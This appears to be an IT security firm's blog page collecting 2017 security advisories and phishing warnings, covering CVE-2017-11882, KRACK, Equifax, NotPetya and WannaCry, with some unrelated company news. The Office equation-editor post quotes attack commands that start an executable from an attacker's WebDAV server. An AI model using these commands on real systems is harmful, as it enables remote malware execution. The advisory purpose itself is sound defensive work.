Sales: 585-624-7210 - Service: 585-582-1600

Comment

Skeleton in the closet: 17-year old MS office flaw allows malware install when user opens file

Here is a new pain in the neck! Fix this one ASAP.

While the world is still dealing with the threat of 'unpatched' Microsoft Office's built-in DDE feature, researchers have uncovered a serious issue with another Office component that could allow attackers to remotely install malware on targeted computers.

The vulnerability is a memory-corruption issue that resides in all versions of Microsoft Office released in the past 17 years, including Microsoft Office 365, and works against all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.

Discovered by the security researchers at Embedi, the vulnerability leads to remote code execution, allowing an unauthenticated, remote attacker to execute malicious code on a targeted system without requiring user interaction after opening a malicious document. Here is how it looks, when you see the CALC coming up, that means the attacker was able to run any executable they want.

Skeleton_In_Closet-1.png

The vulnerability, identified as CVE-2017-11882, resides in EQNEDT32.EXE, an MS Office component which is responsible for insertion and editing of equations (OLE objects) in documents.

However, due to improper memory operations, the component fails to properly handle objects in the memory, corrupting it in such a way that the attacker could execute malicious code in the context of the logged-in user.

Seventeen years ago, EQNEDT32.EXE was introduced in Microsoft Office 2000 and had been kept in all versions released after Microsoft Office 2007 in order to ensure the software remains compatible with documents of older versions.

Exploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software.

This vulnerability could be exploited to take complete control over a system when combined with Windows Kernel privilege escalation exploits (like CVE-2017-11847).

Possible Attack Scenario:

While explaining the scope of the vulnerability, Embedi researchers suggested several attack scenarios listed below:

"By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it)."

"One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker."

"Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient."

"After that, an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service."

Protection Against Microsoft Office Vulnerability

With this month's Patch release, Microsoft has addressed this vulnerability by changing how the affected software handles objects in memory.

So, users are strongly recommended to apply November security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers.

Since this component has a number of security issues which can be easily exploited, disabling it could be the best way to ensure your system security.

Users can run the following command in the command prompt to disable registering of the component in Windows registry:

reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

For 32-bit Microsoft Office package in x64 OS, run the following command:

reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

Besides this, you should also enable Protected View (Microsoft Office sandbox) to prevent active content execution (OLE/ActiveX/Macro).

Consider formalized Phishing and security training for your organization.

https://www.skyport-it.com/phishing

“We don’t just manage data security. We fortify I.T.”

Safe Regards,
Dan

Comment

Comment

Wi-Fi KRACKED?

On October 16, 2017 the U.S. Department of Homeland Security announced the news of the KRACK (‘key reinstallation attack’) flaw in the protocol which was designed to secure all modern protected Wi-Fi networks.  

Unfortunately, that means that the technology used to secure and protect communications between routers, mobile devices and IoT devices may not provide the protection expected, and permits hackers within range of the Wi-Fi network to hijack connections, decrypt traffic and view communications on all Wi-Fi enabled devices.

The good news for our managed security service clients, is that we automatically mitigated any potential for breaches in your data infrastructure and updated all your existing software with the needed patch immediately, making the transition transparent to you.

If you are not a SkyPort IT managed security services customer, we can still help!  Please contact us immediately and we will schedule review your security risks and create a SkyPort Fortification Plan. 

For your Free Risk Assessment and Fortification Plan, click here.

Comment

Comment

SkyPort IT Nominates National Alliance on Mental Illness (NAMI) for M&T Business Challenge

SkyPort IT nominated the National Alliance on Mental Illness (NAMI) in Rochester, for the Understanding What’s Important Business Challenge for a chance for NAMI to win up to $10,000.  M&T Bank is sponsoring the challenge to celebrate the good that businesses are doing in the community and to help support organizations we care about - like NAMI.  

NAMI Rochester is an independent affiliate of the National Alliance on Mental Illness and NAMI New York State. They are a grassroots, not for profit, volunteer driven organization that has been in Monroe County for over 35 years. Mental illness affects 20% of Americans regardless of their age, race, religion, education or income. These devastating medical conditions can disrupt a person’s thinking, feeling, moods ability to relate to others and daily functioning.  We support the initiatives NAMI takes to improve mental health in our community, a challenge that is becoming more difficult every day.

As you know, SkyPort IT, Inc., provides managed IT security services to protect client’s data. What you may not know is that we often provide nonprofits with donated equipment, software and reduced rates for IT security and data protection services.

“SkyPort IT has been wonderful in supporting our requirements for protected healthcare information,” said Patricia Sine, executive director, National Alliance on Mental Illness (NAMI). “Although we have put in place the foundation for a secure infrastructure, NAMI could benefit from this award.”

Like the majority of our clients who are under regulatory requirements for data protection, NAMI has the requirement to become HIPAA/HITECH  (protected healthcare information) compliant as they are adding services that will put them in the category of a “covered entity” that is regulated by the government to protect patient data.  To help NAMI achieve compliance, we have donated security services and other equipment.  New PCs will enhance staff efficiency resulting in better performance and less ongoing issues due to their age. The award would also be used to get additional services to protect data that would include encrypted email.

Five finalists will be selected in October and the public will have a chance to vote for their favorite starting November 2.  Should NAMI be selected as a finalist, we will make you aware in the event you would like to vote for them and increase their chance of winning $10,000.

Comment

      You already know that a whopping 143 million Equifax records were compromised. The difference with this one is that a big-three credit bureau like Equifax tracks so much personal and sometimes confidential information like social security numbers, full names, addresses, birth dates, and even drivers licenses and credit card numbers for some.  It can be the difference between being able to buy a house or sometimes even get a job or not. This breach and the way they handled it, including the announcement, was what Brian Krebs rightfully called a dumpster fire.  The problem is that with this much personal information in the hands of the bad guys, highly targeted spear phishing attacks can be expected, and a variety of other related crime like full-on identity theft on a much larger scale.  These records are first going to be sold on the dark web to organized crime for premium prices, for immediate exploitation, sometimes by local gangs on the street. Shame on Equifax for this epic fail. They will be sued for billions of dollars for this web-app vulnerability.  So this Scam of the Week covers what is inevitable in the near future, we have not seen actual Equifax phishing attacks at this point yet, but you can expect them in the coming days and weeks because the bad guys are going to take their most efficient way to leverage this data... email.  I suggest you send the following to your employees, friends, and family. You're welcome to copy, paste, and/or edit:   "Cyber criminals have stolen 143 million credit records in the recent hacking scandal at big-three credit bureau Equifax. At this point you have to assume that the bad guys have highly personal information that they can use to trick you. You need to watch out for the following things:      Phishing emails that claim to be from Equifax where you can check if your data was compromised         Phishing emails that claim there is a problem with a credit card, your credit record, or other personal financial information         Calls from scammers that claim they are from your bank or credit union         Fraudulent charges on any credit card because your identity was stolen     Here are 5 things you can do to prevent identity theft:      First sign up for credit monitoring (there are many companies providing that service including Equifax but we cannot recommend that)         Next freeze your credit files at the three major credit bureaus Equifax, Experian and TransUnion. Remember that generally it is not possible to sign up for credit monitoring services after a freeze is in place. Advice for how to file a freeze is available here on a state-by-state basis:  http://consumersunion.org/research/security-freeze/          Check your credit reports via the free annualcreditreport.com         Check your bank and credit card statements for any unauthorized activity         If you believe you may have been the victim of identity theft, here is a site where you can learn more about how to protect yourself:  www.idtheftcenter.org . You can also call the center’s toll-free number (888-400-5530) for advice on how to resolve identify-theft issues. All of the center’s services are free.     And as always, Think Before You Click!    It's only early days in this hack, there will be a lot more information coming out in the days ahead. We will keep you updated when more news is available.  

Comment

Scam of the Week: Equifax Phishing

You already know that a whopping 143 million Equifax records were compromised. The difference with this one is that a big-three credit bureau like Equifax tracks so much personal and sometimes confidential information like social security numbers, full names, addresses, birth dates, and even drivers licenses and credit card numbers for some.

Comment

      [ALERT] The IRS Issued An Urgent Warning Against An IRS / FBI-Themed Ransomware Phishing Attack  WASHINGTON, August 28, 2017 — The Internal Revenue Service warned people to avoid a new phishing scheme that impersonates the IRS and the FBI as part of a ransomware scam to take computer data hostage.  The IRS said: "The scam email uses the emblems of both the IRS and the Federal Bureau of Investigation. It tries to entice users to select a “here” link to download a fake FBI questionnaire. Instead, the link downloads a certain type of malware called ransomware that prevents users from accessing data stored on their device unless they pay money to the scammers."  “This is a new twist on an old scheme,” said IRS Commissioner John Koskinen. “People should stay vigilant against email scams that try to impersonate the IRS and other agencies that try to lure you into clicking a link or opening an attachment. People with a tax issue won’t get their first contact from the IRS with a threatening email or phone call."   I suggest you send employees, friends and family an email about this ransomware attack, you're welcome to copy/paste/edit:      "Heads-up! The IRS is warning against a new phishing scam that tries to make you download an FBI questionnaire. But if you click the link, your computer will be infected with ransomware instead. The scam email uses the emblems of both the IRS and the Federal Bureau of Investigation.  Remember that the IRS does not use email, text messages or social media to discuss personal tax issues, such as those involving bills or refunds. THINK BEFORE YOU CLICK!     The IRS stated: "Victims should not pay a ransom. Paying it further encourages the criminals, and frequently the scammers won’t provide the decryption key even after a ransom is paid. Victims should immediately report any ransomware attempt or attack to the FBI at the Internet Crime Complaint Center,  www.IC3.gov . Forward any IRS-themed scams to  phishing@irs.gov ."  Here is the official IRS Newsroom post:  https://www.irs.gov/uac/newsroom/irs-issues-urgent-warning-to-beware-irs-fbi-themed-ransomware-scam

Comment

WASHINGTON, August 28, 2017 — The Internal Revenue Service warned people to avoid a new phishing scheme that impersonates the IRS and the FBI as part of a ransomware scam to take computer data hostage.

Comment

      EXECUTIVE BRIEF: WHY ADVANCED THREATS DEMAND ADVANCED EMAIL SECURITY   Email usage continues to increase    Regardless of the proliferation of text and social media, email communication is still growing strong. According to a recent study by the Radicati Group, the total volume of worldwide emails sent and received reached 205 billion per day, with this volume projected to increase by at least 5% every year. And, this fact is not lost upon hackers, who are constantly seeking opportunities to exploit organizations. ( The Radicati Group, Inc.,   Email Statistics Report, 2015-2019  )  Anatomy of an email attack:  • A CFO gets an email from the CEO authorizing an emergency fund transfer. But the email is actually from a cybercriminal.  • An employee with administrative rights to key systems receives an urgent email from IT to update their network password. They actually disclose their password to cybercriminals.  • An employee receives an email to read an important attachment about their benefits provider. When they open the attachment, they unknowingly activate hidden Trojan malware.   E-mail threats organizations face today    Emails offer hackers a vehicle to deliver a variety of vulnerabilities to an organization. Some of the more common email-borne threats include:                   Malware  – email is one of the top delivery mechanisms to distribute known & unknown malware, which are typically embedded into email attachments in hopes that the attachment will be opened or downloaded onto a computer or network, thereby allowing hackers to gain access to resources, steal data, or crash systems.                   Ransomware  – one particularly nefarious malware variant is ransomware. Once the email attachment is activated, the code embeds itself on a network and ransomware typically encrypts or locks critical files and systems. The hackers then coerce the organization to pay an extortion fee in order to have the files or systems un-encrypted or unlocked.                   Phishing  – this common hacker tactic utilizes emails with embedded links to hacker sites. When gullible users visit these sites, they’re prompted to enter PII (Personably Identifiable Information) that is in turn used to steal identities, compromise corporate data, or access other critical systems.                   Spear Phishing / Whaling  – in this variant of phishing, key IT/networking individuals or company execs are targeted using malware-laced emails appearing to come from a trusted source, in efforts to gain access to internal systems & data.                   Business Email Compromise / CEO Fraud / Impostor email  – Over the past two years, Business Email Compromise (BEC) schemes have caused at least $3.1 billion in total losses to approximately 22,000 enterprises around the world, according to the latest figures from the FBI1. The FBI defines Business Email Compromise as a sophisticated email scam that targets businesses working with foreign partners that regularly perform wire transfer payments.                   Spam  – emails are used to deliver spam or unsolicited messages, which can clog inboxes and network resources, diminish businesses productivity, and increase operational costs.                   Outbound Email Hijacking  – corporations are also subject to corporate policies and government regulations, which hold businesses accountable for their outgoing emails and ensuring they protect their customer’s PII. Zombie attacks and IP hi-jacking can disseminate customer PII, ruining the reputation of a business.   Conclusion    Emails communications are essential to organizations today, something hackers are keenly aware of. Given today’s complex, mature threats, it’s tantamount that organizations deploy a multi-layered security solution that includes dedicated, leading-edge, email protection. To effectively combat today’s emerging threats, organizations are well-advised to implement a next-generation email security management solution that provides fundamental email protection. To learn more about ways to protect your organization’s emails.   What your next-gen multi-layered security needs to stop advanced threats.     (  www.ic3.gov/media/2016/160614.aspx  )   About SkyPort IT, Inc   SkyPort IT promises a relentless focus on data security and regulatory compliance so our clients can focus on their business by using best practices and best-in-class technology to proactively design, deploy, and protect clients’ IT infrastructure and data. Why Managed Security Services? Visit: www.skyport-it.com for the answer or for a free consult call us at 585-582-1600 or email SecureMe@skyport-it.com

Comment

In today’s hyper-connected world, email-based communications are not just commonplace – they have become a fundamental cornerstone for effectively conducting business, with the total volume of worldwide emails sent per day projected to increase by at least 5% every year. Given the ubiquitous nature of email communications, emails are and will continue to be a popular vector for a variety of threats.

Comment

      NotPetya Is a Cyber Weapon, Not Ransomware  Yesterday morning, after monitoring this new outbreak for 24 hours, I came to the conclusion we were dealing with cyber warfare, and not ransomware. Two separate reports coming from Comae Technologies and Kaspersky Lab experts confirm this now.  NotPetya is a destructive disk wiper similar to Shamoon which has been targeting Saudi Arabia in the recent past.  Note that Shamoon actually deleted files, NotPetya goes about it slightly different, it does not delete any data but simply makes it unusable by locking the files and then throwing away the key. The end result is the same.  Someone is hijacking known ransomware families and using them to attack Ukrainian computer systems. Guess who.  You never had a chance to recover your files. There are several technical indicators that NotPetya was only made to look as ransomware as a smoke screen:  It never bothers to generate a valid infection ID The Master File Table gets overwritten and is not recoverable The author of the original Petya also made it clear NotPetya was not his work This has actually happened earlier. Foreshadowing the NotPetya attack, the author of the AES-NI ransomware said in May he did not create the XData ransomware, which was also used in targeted attacks against Ukraine. Furthermore, both XData and NotPetya used the same distribution vector, the update servers of a Ukrainian accounting software maker.  Catalin Cimpanu, the Security News Editor for Bleepingcomputer stated: "The consensus on NotPetya has shifted dramatically in the past 24 hours, and nobody would be wrong to say that NotPetya is on the same level with Stuxnet and BlackEnergy, two malware families used for political purposes and for their destructive effects. Evidence is clearly mounting that NotPetya is a cyber-weapon and not just some overly-aggressive ransomware."  Cybersecurity has moved from Tech to a CEO and Board-level business issue  You did not sign up for this, but today it is abundantly clear that as an IT pro you are have just found yourself on the front line of 21-st century cyber war. Cybersecurity has moved from Tech to a CEO and Board-level business issue.  I strongly suggest you have another look at your defense-in-depth, and make sure to:   Have weapons-grade backups  Religiously patch  Step users through new-school security awareness training   I would be happy to visit and explain our Managed Security Services, multi-layered protection schema to current and prospective customers.   Think before you click!  Safe Regards,  Dan

Comment

NotPetya is a destructive disk wiper similar to Shamoon which has been targeting Saudi Arabia in the recent past.

Comment

      Scam of the Week: Massive DocuSign Phishing Attacks  DocuSign has admitted they were the victim of a data breach that has led to massive phishing attacks which used exfiltrated DocuSign information. Ouch. So here is your Scam of the Week.  They discovered the data breach when on May 9, 15, and 17 DocuSign, customers were being targeted with phishing campaigns. They now are advising customers to filter or delete any emails with specific subject lines. We do not repeat them here, because this newsletter might be filtered out, but you can see them at the blog, together with screenshots:  https://blog.knowbe4.com/scam-of-the-week-docusign-phishing-attacks   The campaigns all have Word docs as attachments, and use social engineering to trick users into activating Word's macro feature which will download and install malware on the user's workstation. DocuSign warned that it is highly likely there will be more campaigns in the future.  I suggest you send the following to your employees. You're welcome to copy, paste, and/or edit:  "Hackers have stolen the customer email database of DocuSign, the company that allows companies to electronically sign documents. These criminals are now sending phishing emails that look exactly like the real DocuSign ones, but they try to trick you into opening an attached Word file and click to enable editing.  But if you do that, malware may be installed on your workstation. So if you get emails that look like they come from DocuSign and have an attachment, be very careful. If there is any doubt, pick up the phone and verify before you electronically sign any DocuSign email. Remember: Think Before You Click."  Safe Regards, Dan

Comment

Scam of the Week: Massive DocuSign Phishing Attacks

DocuSign has admitted they were the victim of a data breach that has led to massive phishing attacks which used exfiltrated DocuSign information. Ouch. So here is your Scam of the Week.

They discovered the data breach when on May 9, 15, and 17 DocuSign, customers were being targeted with phishing campaigns. They now are advising customers to filter or delete any emails with specific subject lines. We do not repeat them here, because this newsletter might be filtered out, but you can see them at the blog, together with screenshots:
https://blog.knowbe4.com/scam-of-the-week-docusign-phishing-attacks

The campaigns all have Word docs as attachments, and use social engineering to trick users into activating Word's macro feature which will download and install malware on the user's workstation. DocuSign warned that it is highly likely there will be more campaigns in the future.

I suggest you send the following to your employees. You're welcome to copy, paste, and/or edit:

"Hackers have stolen the customer email database of DocuSign, the company that allows companies to electronically sign documents. These criminals are now sending phishing emails that look exactly like the real DocuSign ones, but they try to trick you into opening an attached Word file and click to enable editing.

But if you do that, malware may be installed on your workstation. So if you get emails that look like they come from DocuSign and have an attachment, be very careful. If there is any doubt, pick up the phone and verify before you electronically sign any DocuSign email. Remember: Think Before You Click."

Safe Regards,
Dan

Comment

      Latest Wannacry Ransomware Information  Hi Folks,  Just watched  https://www.sans.org/webcasts/latest-wannacry-ransomware-105150 .  If you’ve not been keeping up with the Wannacry ransomware, it’s probably worth an hour to view it.  The insight on how people were tracking it down and reacting to it could be useful.  I’d give it a 4/5 on topic/interest/content depending on how much you’ve already learned about wannacry.  Safe Regards, Dan

Comment

Latest Wannacry Ransomware Information

Hi Folks,

Just watched https://www.sans.org/webcasts/latest-wannacry-ransomware-105150.

If you’ve not been keeping up with the Wannacry ransomware, it’s probably worth an hour to view it.  The insight on how people were tracking it down and reacting to it could be useful.

I’d give it a 4/5 on topic/interest/content depending on how much you’ve already learned about wannacry.

Safe Regards,
Dan

Comment

      [URGENT ALERT] Defend Against This Ransomware WMD NOW   This is not a drill, or a phishing test.   Yet unknown cyber criminals have taken an NSA 0-day threat and weaponized a ransomware strain so that it replicates like a worm and takes over the whole network.    This is the biggest ransomware outbreak in history.  There is a MS patch that needs to be applied urgently if you have not done that already.   I suggest you immediately look into this and patch your systems before your users come back to work on Monday. Here is a blog post with all the updated detail:   https://blog.knowbe4.com/ransomware-attack-uses-nsa-0-day-exploits-to-go-on-worldwide-rampage   Yes, if you hover, this link is redirected, but you can cut&paste the link to our blog if you are paranoid. (which you should be!)  This is a bad one. Let's stay safe out there.   Safe Regards,  Dan

Comment

[URGENT ALERT] Defend Against This Ransomware WMD NOW

This is not a drill, or a phishing test.

Yet unknown cyber criminals have taken an NSA 0-day threat and weaponized a ransomware strain so that it replicates like a worm and takes over the whole network. 

This is the biggest ransomware outbreak in history. There is a MS patch that needs to be applied urgently if you have not done that already. 

I suggest you immediately look into this and patch your systems before your users come back to work on Monday. Here is a blog post with all the updated detail:

https://blog.knowbe4.com/ransomware-attack-uses-nsa-0-day-exploits-to-go-on-worldwide-rampage

Yes, if you hover, this link is redirected, but you can cut&paste the link to our blog if you are paranoid. (which you should be!)

This is a bad one. Let's stay safe out there. 

Safe Regards,

Dan

Comment

      New York is the first State to enforce regulation laws towards Financial companies specific to Cyber Security.  The regulation makes it clear that cybersecurity is not solely a technology or information security team matter. It comprises an enterprise-level approach to managing cyber risk by expressly imposing responsibility for the cybersecurity program on senior management and requiring not only technical controls, but operational controls, policies and procedures, training programs and reporting to senior management and the board.  Many pieces of this regulations are expected to be adopted by the end of this summer.  Here is a great article on this topic.   http://ahearnelaw.com/revised-newyork-cybersecurity-rules-for-financial-companies-start-march-1-2017/   From NYS DFS:  http://www.dfs.ny.gov/legal/regulations/adoptions/dfsrf500txt.pdf   Also check with your associations to see if they have developed templates for your industry for policies and procedures.  As part of our managed services we help in the development of proper policies and procedures. This is the first step in compliance. However, few organizations have proper ones in place. Our years of experience in HIPAA and PCI-DSS make this a no-brainer. It is like running a business without a business plan, bad things can happen.  Safe Regards,| Dan  P.S. – You may find (and request) useful information here on our site:  https://www.skyport-it.com/useful-materials-just-for-you

Comment

New York is the first State to enforce regulation laws towards Financial companies specific to Cyber Security.  The regulation makes it clear that cybersecurity is not solely a technology or information security team matter. It comprises an enterprise-level approach to managing cyber risk by expressly imposing responsibility for the cybersecurity program on senior management and requiring not only technical controls, but operational controls, policies and procedures, training programs and reporting to senior management and the board.

Many pieces of this regulations are expected to be adopted by the end of this summer.

Here is a great article on this topic.

http://ahearnelaw.com/revised-newyork-cybersecurity-rules-for-financial-companies-start-march-1-2017/

From NYS DFS: http://www.dfs.ny.gov/legal/regulations/adoptions/dfsrf500txt.pdf

Also check with your associations to see if they have developed templates for your industry for policies and procedures.

As part of our managed services we help in the development of proper policies and procedures. This is the first step in compliance. However, few organizations have proper ones in place. Our years of experience in HIPAA and PCI-DSS make this a no-brainer. It is like running a business without a business plan, bad things can happen.

Safe Regards,|
Dan

P.S. – You may find (and request) useful information here on our site: https://www.skyport-it.com/useful-materials-just-for-you

Comment

      Hey: Don’t Click That Weird Google Docs Link You Just Got (and Tell Your Mom Not to Click, Either)  A very convincing Google Docs phishing scheme is racing around the internet right now, which means you should avoid clicking any weird Google Docs that have been emailed to you recently — even if it’s from someone you know. It’s spreading incredibly quickly:  Safe Regards, Dan

Comment

Hey: Don’t Click That Weird Google Docs Link You Just Got (and Tell Your Mom Not to Click, Either)

Comment

      VMware Releases Security Advisories for Various Critical Vulnerabilities in vCenter, Workstation, and more  Description: VMware has releases two security advisories addressing eight vulnerabilities across vCenter Server, Unified Access Gateway, Horizon View, and Workstation. The first advisory details CVE-2017-5641, a remote code execution flaw in vCenter Server manifesting via BlazeDS. The second advisory addresses a vulnerability in Unified Access Gateway and Horizon View that could allow an attacker to execute code on the security gateway. The second advisory also addresses various flaws in Cortado ThinPrint that could allow a guest to execute code or perform a denial of service attack on the host operating system. VMware has released software updates that address these vulnerabilities. Reference: -  http://www.vmware.com/security/advisories/VMSA-2017-0007.html  -  http://www.vmware.com/security/advisories/VMSA-2017-0008.html  Snort SID: Detection pending release of vulnerability information

Comment

VMware Releases Security Advisories for Various Critical Vulnerabilities in vCenter, Workstation, and more

VMware has releases two security advisories addressing eight vulnerabilities across vCenter Server, Unified Access Gateway, Horizon View, and Workstation.

Comment

      Overlooking risks leads to breach, $400,000 settlement  The U.S. Department of Health and Human Services, Office for Civil Rights (OCR), has announced a Health Insurance Portability and Accountability Act of 1996 (HIPAA) settlement based on the lack of a security management process to safeguard electronic protected health information (ePHI). Metro Community Provider Network (MCPN), a federally-qualified health center (FQHC), has agreed to settle potential noncompliance with the HIPAA Privacy and Security Rules by paying $400,000 and implementing a corrective action plan. With this settlement amount, OCR considered MCPN’s status as a FQHC when balancing the significance of the violation with MCPN’s ability to maintain sufficient financial standing to ensure the provision of ongoing patient care. MCPN provides primary medical care, dental care, pharmacies, social work, and behavioral health care services throughout the greater Denver, Colorado metropolitan area to approximately 43,000 patients per year, a large majority of whom have incomes at or below the poverty level.  On January 27, 2012, MCPN filed a breach report with OCR indicating that a hacker accessed employees' email accounts and obtained 3,200 individuals' ePHI through a phishing incident. OCR’s investigation revealed that MCPN took necessary corrective action related to the phishing incident; however, the investigation also revealed that MCPN failed to conduct a risk analysis until mid-February 2012. Prior to the breach incident, MCPN had not conducted a risk analysis to assess the risks and vulnerabilities in its ePHI environment, and, consequently, had not implemented any corresponding risk management plans to address the risks and vulnerabilities identified in a risk analysis. When MCPN finally conducted a risk analysis, that risk analysis, as well as all subsequent risk analyses, were insufficient to meet the requirements of the Security Rule.  “Patients seeking health care trust that their providers will safeguard and protect their health information,” said OCR Director Roger Severino. “Compliance with the HIPAA Security Rule helps covered entities meet this important obligation to their patient communities.”  The Resolution Agreement and Corrective Action Plan may be found on the OCR website at  http://www.hhs.gov/hipaa/for-professionals/compliance-enforcement/agreements/MCPN   OCR’s guidance on the Security Rule may be found at  https://www.hhs.gov/hipaa/for-professionals/security/guidance/index.html   To learn more about non-discrimination and health information privacy laws, your civil rights, and privacy rights in health care and human service settings, and to find information on filing a complaint, visit us at  http://www.hhs.gov/hipaa/index.html

Comment

Overlooking risks leads to breach, $400,000 settlement

On January 27, 2012, MCPN filed a breach report with OCR indicating that a hacker accessed employees' email accounts and obtained 3,200 individuals' ePHI through a phishing incident.

Comment

      [ALERT] You Want To Fix This MS-Word 0-day Threat Today  Monday night, researchers at Proofpoint sounded the alarm about a critical 0-day threat known as CVE-2017-0199 in Microsoft Word that allowed booby-trapped Dridex phishing attacks be sent to millions of employees claiming to be a PDF sent to them by their company photocopier.  This one is particularly bad because it bypasses exploit mitigations built into Windows, doesn't require your employee to enable macros, works even against Windows 10 which is Redmond's most secure OS yet, and this exploit works on most or all Windows versions of Word. Ouch!  Campaign Uses Spoofed Email Domains  Dridex used to rely on macro-infected documents attached to emails and use social engineering to trick the user to open the attachment and click the macro button. This time around they were pretty nimble and leveraged a zero-day in Word. Proofpoint's technical analysis said:  "Emails in this campaign used an attached Microsoft Word RTF (Rich Text Format) document. Messages purported to be from "". [device] may be "copier", "documents", "noreply", "no-reply", or "scanner". The subject line in all cases read "Scan Data" and included attachments named "Scan_123456.doc" or "Scan_123456.pdf", where "123456" was replaced with random digits. Note that while this campaign does not rely on sophisticated social engineering, the spoofed email domains and common practice of emailing digitized versions of documents make the lures fairly convincing.   What To Do About It?   1) Patch. Fortunately, on Tuesday Microsoft released its regular batch of security patches - including a fix for this nasty Office zero-day vulnerability CVE-2017-0199. Turns out that this wasn't the only thing needed patching. An elevation of privilege vulnerability in Internet Explorer (CVE-2017-0210) that would allow an attacker to convince a user to visit a compromised website was also fixed.  2) If you cannot patch. Here is a quick and dirty fix to prevent this exploit from working by adding the following to your Windows registry: Software\Microsoft\Office\15.0\Word\Security\FileBlock\RtfFiles to 2 and OpenInProtectedView to 0.   3) Find out if your domain can be spoofed. Did you know that one of the first things hackers try is to see if they can spoof the email address of someone in your own domain? Now they can launch a spear phishing attack on your organization.  If you are a managed services customer we are already helping you. If not go here to see why managed services makes sense.  https://www.skyport-it.com/managed-services/   Safe Regards,  Dan

Comment

[ALERT] You Want To Fix This MS-Word 0-day Threat Today

Monday night, researchers at Proofpoint sounded the alarm about a critical 0-day threat known as CVE-2017-0199 in Microsoft Word that allowed booby-trapped Dridex phishing attacks be sent to millions of employees claiming to be a PDF sent to them by their company photocopier.

Comment

       Five-year prediction: cloud vs. data center   Analysts, tech bloggers and IT managers have been debating the net value of using data centers vs. the public cloud for years now. We’ve seen opinions around business advantages and disadvantages for both, but which will ultimately win the cost war in the future? We went straight to the front lines of IT for answers.  We sat down with Samuel Alt, technical support specialist at Ingram Micro, to get his future forecast. He has extensive, real-world experience with both data centers and the cloud, and his five-year prediction may surprise you.   Everyone's talking about the cloud overtaking data centers. What's your opinion?  The short-term play for many companies is cloud, due to low upfront costs and instant scalability, but I question its long-term sustainability due to cost. As for the landscape five years from now, I actually see a shift back to an energy-efficient, powerful, shrunken form of data centers.   What will hurt the cloud play in the future?  Cost will eventually kill cloud momentum. The cloud appears cost-effective at first, but gets expensive quickly as you scale. Some organizations must store thousands of terabytes—that’s going to be a pain point as the world consumes more data. Cloud bandwidth is expensive. Cloud SQL storage is expensive.  There’s also a lack of control and flexibility in the cloud. I like to see, touch, migrate and own my data. Depending on what you’re using it for, it may be difficult and time-consuming to pull down your data when you want it.  Also, there’s always a bit of paranoia when it comes to someone else hosting your data. You have no idea whether it’s physically residing in Texas, Ohio, China—it could be sitting anywhere.   Why do you think data centers will make a comeback in five years?  I’ll start with my mobile phone analogy—the early consumer wireless phones were huge bricks. Then, they trended toward slimmer models with small screens. Today, they’re massive again, in the form of phablets with big screens, because that’s what consumers wanted all along. Since companies have never stopped wanting control over their data, I think we’ll see a similar return to on-premise data centers, just in a superior, resurrected form.   What will data centers look like in the future?  Smaller, extremely energy-efficient and more powerful. Imagine what people love about the cloud, but in a controllable, on-premise environment. That’s the future of data centers. The ideal scenario is total control over your data, but at a significantly lower cost and without taking up much physical real estate.   What else needs to happen in order to see a shift back to data centers?  Power efficiency is critical. One component that measures this is power usage effectiveness (PUE), which calculates the ratio of total amount of energy used by a data center facility to the energy delivered to computing equipment.  Currently, powering up a data center is expensive, but it won’t always be. Energy-efficient data centers will produce dramatic savings when it comes to power, heating and cooling costs.   What's the tipping point?  The cost of hardware (cooling infrastructure, firewalls, tape drives, etc.) will decrease and the cost of using the cloud will increase. IT managers will balk at the annual cloud spend. Again, pricing will catch up to the cloud as we consume more data.  Going forward, I think that cloud will have a great place in the SMB and small data center market. However, any mid- to large-scale data center will not be willing to change due to a cost perspective.   Can you speak more to the physical size of future data centers?  Data centers will shrink with virtualization. The days of massive racks filled with networking equipment will go away. (Think old IBM mainframes that took up half a building.) Space is money. Real estate is a key reason why companies go to the cloud—with virtualization, that won’t be a factor. Consider how hyperconvergence integrates storage, networking and virtualization all in one box.  In five years, you could run an enterprise from a small closet. In 10 years, from your pocket.

Comment

FIVE-YEAR PREDICTION: CLOUD VS. DATA CENTER

Analysts, tech bloggers and IT managers have been debating the net value of using data centers vs. the public cloud for years now. We’ve seen opinions around business advantages and disadvantages for both, but which will ultimately win the cost war in the future? We went straight to the front lines of IT for answers.

Comment

      NOTABLE RECENT SECURITY ISSUES  Title: Cisco Releases Critical Security Advisory For IOS and IOS XE 0-day Found in "Vault 7" Info Dump Description: Cisco has released a critical security advisory in response to CVE-2017-3881, a 0-day vulnerability that was identified in the "Vault 7" information dump. CVE-2017-3881 is a remote code execution vulnerability that manifests in the Cisco Cluster Management Protocol (CMP) processing functionality of IOS and IOS XE. A remote, unauthenticated attacker who transmits malformed CMP-specific Telnet options to a vulnerable device could exploit this flaw and execute arbitrary code with elevated privileges. Note that the vulnerable device must be configured to accept Telnet connections. Cisco is currently developing software updates that will address this vulnerability. Reference:  https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp  Snort SID: 41909-41910

Comment

Cisco Releases Critical Security Advisory For IOS and IOS XE 0-day Found in "Vault 7" Info Dump

Comment

